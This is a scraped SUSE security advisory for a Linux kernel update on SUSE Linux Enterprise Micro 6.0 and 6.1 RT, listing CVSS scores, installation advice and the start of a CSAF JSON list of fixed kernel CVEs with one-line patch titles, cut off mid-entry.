To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.1 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise Micro 6.0 and 6.1 RT kernel was updated to receive various security bugfixes.\n\n\nThe following security bugs were fixed:\n\n- CVE-2023-53817: crypto: lib/mpi - avoid null pointer deref in mpi_cmp_ui() (bsc#1254992).\n- CVE-2025-37861: scsi: mpi3mr: Synchronous access b/w reset and tm thread for reply queue (bsc#1243055).\n- CVE-2025-38321: smb: Log an error when close_all_cached_dirs fails (bsc#1246328).\n- CVE-2025-38728: smb3: fix for slab out of bounds on mount to ksmbd (bsc#1249256).\n- CVE-2025-39748: bpf: Forget ranges when refining tnum after JSET (bsc#1249587).\n- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).\n- CVE-2025-39890: wifi: ath12k: fix memory leak in ath12k_service_ready_ext_event (bsc#1250334).\n- CVE-2025-39964: crypto: af_alg - Disallow concurrent writes in af_alg_sendmsg (bsc#1251966).\n- CVE-2025-39977: futex: Prevent use-after-free during requeue-PI (bsc#1252046).\n- CVE-2025-40006: mm/hugetlb: fix folio is still mapped when deleted (bsc#1252342).\n- CVE-2025-40024: vhost: Take a reference on the task in struct vhost_task (bsc#1252686).\n- CVE-2025-40033: remoteproc: pru: Fix potential NULL pointer dereference in pru_rproc_set_ctable() (bsc#1252824).\n- CVE-2025-40042: tracing: Fix race condition in kprobe initialization causing NULL pointer dereference (bsc#1252861).\n- CVE-2025-40053: net: dlink: handle copy_thresh allocation failure (bsc#1252808).\n- CVE-2025-40081: perf: arm_spe: Prevent overflow in PERF_IDX2OFF() (bsc#1252776).\n- CVE-2025-40099: cifs: parse_dfs_referrals: prevent oob on malformed input (bsc#1252911).\n- CVE-2025-40102: KVM: arm64: Prevent access to vCPU events before init (bsc#1252919).\n- CVE-2025-40103: smb: client: Fix refcount leak for cifs_sb_tlink (bsc#1252924).\n- CVE-2025-40123: bpf: Enforce expected_attach_type for tailcall compatibility (bsc#1253365).\n- CVE-2025-40134: dm: fix NULL pointer dereference in __dm_suspend() (bsc#1253386).\n- CVE-2025-40135: ipv6: use RCU in ip6_xmit() (bsc#1253342).\n- CVE-2025-40153: mm: hugetlb: avoid soft lockup when mprotect to large memory area (bsc#1253408).\n- CVE-2025-40158: ipv6: use RCU in ip6_output() (bsc#1253402).\n- CVE-2025-40160: xen/events: Cleanup find_virq() return codes (bsc#1253400).\n- CVE-2025-40167: ext4: detect invalid INLINE_DATA + EXTENTS flag combination (bsc#1253458).\n- CVE-2025-40170: net: use dst_dev_rcu() in sk_setup_caps() (bsc#1253413).\n- CVE-2025-40178: pid: Add a judgment for ns null in pid_nr_ns (bsc#1253463).\n- CVE-2025-40179: ext4: verify orphan file size is not too big (bsc#1253442).\n- CVE-2025-40187: net/sctp: fix a null dereference in sctp_disposition sctp_sf_do_5_1D_ce() (bsc#1253647).\n- CVE-2025-40190: ext4: guard against EA inode refcount underflow in xattr update (bsc#1253623).\n- CVE-2025-40192: Revert \"ipmi: fix msg stack when IPMI is disconnected\" (bsc#1253622).\n- CVE-2025-40220: fuse: fix livelock in synchronous file put from fuseblk workers (bsc#1254520).\n- CVE-2025-40231: vsock: fix lock inversion in vsock_assign_transport() (bsc#1254815).\n- CVE-2025-40233: ocfs2: clear extent cache after moving/defragmenting extents (bsc#1254813).\n- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).\n- CVE-2025-40240: sctp: avoid NULL dereference when chunk data buffer is missing (bsc#1254869).\n- CVE-2025-40242: gfs2: Fix unlikely race in gdlm_put_lock (bsc#1255075).\n- CVE-2025-40248: vsock: Ignore signal/timeout on connect() if already established (bsc#1254864).\n- CVE-2025-40250: net/mlx5: Clean up only new IRQ glue on request_irq() failure (bsc#1254854).\n- CVE-2025-40251: devlink: rate: Unset parent pointer in devl_rate_nodes_destroy (bsc#1254856).\n- CVE-2025-40252: net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end() (bsc#1254849).\n- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).\n- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1254843).\n- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).\n- CVE-2025-40261: nvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).\n- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).\n- CVE-2025-40268: cifs: client: fix memory leak in smb3_fs_context_parse_param (bsc#1255082).\n- CVE-2025-40271: fs/proc: fix uaf in proc_readdir_de() (bsc#1255297).\n- CVE-2025-40274: KVM: guest_memfd: Remove bindings on memslot deletion when gmem is dying (bsc#1254830).\n- CVE-2025-40278: net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak (bsc#1254825).\n- CVE-2025-40279: net: sched: act_connmark: initialize struct tc_ife to fix kernel leak (bsc#1254846).\n- CVE-2025-40280: tipc: Fix use-after-free in tipc_mon_reinit_self() (bsc#1254847).\n- CVE-2025-40289: drm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM (bsc#1255042).\n- CVE-2025-40292: virtio-net: fix received length check in big packets (bsc#1255175).\n- CVE-2025-40293: iommufd: Don\u0027t overflow during division for dirty tracking (bsc#1255179).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255187).\n- CVE-2025-40307: exfat: validate cluster allocation bits of the allocation bitmap (bsc#1255039).\n- CVE-2025-40319: bpf: Sync pending IRQ work before freeing ring buffer (bsc#1254794).\n- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).\n- CVE-2025-40331: sctp: Prevent TOCTOU out-of-bounds write (bsc#1254615).\n- CVE-2025-40338: ASoC: Intel: avs: Do not share the name pointer between components (bsc#1255273).\n- CVE-2025-40339: drm/amdgpu: fix nullptr err of vm_handle_moved (bsc#1255428).\n- CVE-2025-40346: arch_topology: Fix incorrect error check in topology_parse_cpu_capacity() (bsc#1255318).\n- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).\n- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).\n- CVE-2025-40360: drm/sysfb: Do not dereference NULL pointer in plane reset (bsc#1255095).\n- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).\n- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).\n- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).\n- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).\n- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).\n- CVE-2025-68190: drm/amdgpu/atom: Check kcalloc() for WS buffer in amdgpu_atom_execute_table_locked() (bsc#1255131).\n- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).\n- CVE-2025-68201: drm/amdgpu: remove two invalid BUG_ON()s (bsc#1255136).\n- CVE-2025-68204: pmdomain: arm: scmi: Fix genpd leak on provider registration failure (bsc#1255224).\n- CVE-2025-68206: netfilter: nft_ct: add seqadj extension for natted connections (bsc#1255142).\n- CVE-2025-68208: bpf: account for current allocated stack depth in widen_imprecise_scalars() (bsc#1255227).\n- CVE-2025-68209: mlx5: Fix default values in create CQ (bsc#1255230).\n- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).\n- CVE-2025-68230: drm/amdgpu: fix gpu page fault after hibernation on PF passthrough (bsc#1255134).\n- CVE-2025-68239: binfmt_misc: restore write access before closing files opened by open_exec() (bsc#1255272).\n- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).\n- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).\n- CVE-2025-68255: staging: rtl8723bs: fix stack buffer overflow in OnAssocReq IE parsing (bsc#1255395).\n- CVE-2025-68259: KVM: SVM: Don\u0027t skip unrelated instruction if INT3/INTO is replaced (bsc#1255199).\n- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).\n- CVE-2025-68264: ext4: refresh inline data size before write operations (bsc#1255380).\n- CVE-2025-68283: libceph: replace BUG_ON with bounds check for map-\u003emax_osd (bsc#1255379).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).\n- CVE-2025-68295: smb: client: fix memory leak in cifs_construct_tcon() (bsc#1255129).\n- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).\n- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).\n- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).\n- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).\n- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).\n- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).\n- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).\n- CVE-2025-68340: team: Move team device type change at the end of team_port_add (bsc#1255507).\n- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).\n- CVE-2025-68363: bpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu (bsc#1255552).\n- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).\n- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).\n- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).\n- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).\n- CVE-2025-68374: md: fix rcu protection in md_wakeup_thread (bsc#1255530).\n- CVE-2025-68378: bpf: Refactor stack map trace depth calculation into helper function (bsc#1255614).\n- CVE-2025-68379: RDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure (bsc#1255695).\n- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).\n- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).\n- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).\n- CVE-2025-68736: landlock: Fix handling of disconnected directories (bsc#1255698).\n- CVE-2025-68742: bpf: Improve program stats run-time calculation (bsc#1255707).\n- CVE-2025-68744: bpf: Free special fields when update [lru_,]percpu_hash maps (bsc#1255709).\n- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).\n- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).\n- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).\n- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).\n- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).\n- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).\n- CVE-2025-68778: btrfs: don\u0027t log conflicting inode if it\u0027s a dir moved in the current transaction (bsc#1256683).\n- CVE-2025-68785: net: openvswitch: fix middle attribute validation in push_nsh() action (bsc#1256640).\n- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).\n- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).\n- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).\n- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).\n- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).\n- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).\n- CVE-2025-68810: KVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot (bsc#1256679).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).\n- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).\n- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).\n- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).\n- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).\n- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).\n- CVE-2025-71071: iommu/mediatek: fix use-after-free on probe deferral (bsc#1256802).\n- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).\n- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).\n- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).\n- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).\n- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).\n- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).\n- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).\n- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).\n- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).\n- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).\n- CVE-2025-71104: KVM: x86: Fix VM hard lockup after prolonged inactivity with periodic HV timer (bsc#1256708).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2025-71113: crypto: af_alg - zero initialize memory allocated via sock_kmalloc (bsc#1256716).\n- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).\n- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).\n- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).\n- CVE-2025-71126: mptcp: reset fallback status gracefully at disconnect() time (bsc#1256755).\n- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).\n- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).\n- CVE-2025-71137: octeontx2-pf: fix \"UBSAN: shift-out-of-bounds error\" (bsc#1256760).\n- CVE-2025-71148: net/handshake: restore destructor on submit failure (bsc#1257159).\n- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).\n- CVE-2025-71184: btrfs: fix NULL dereference on root when tracing inode eviction (bsc#1257635).\n- CVE-2025-71194: btrfs: fix deadlock in wait_current_trans() due to ignored transaction type 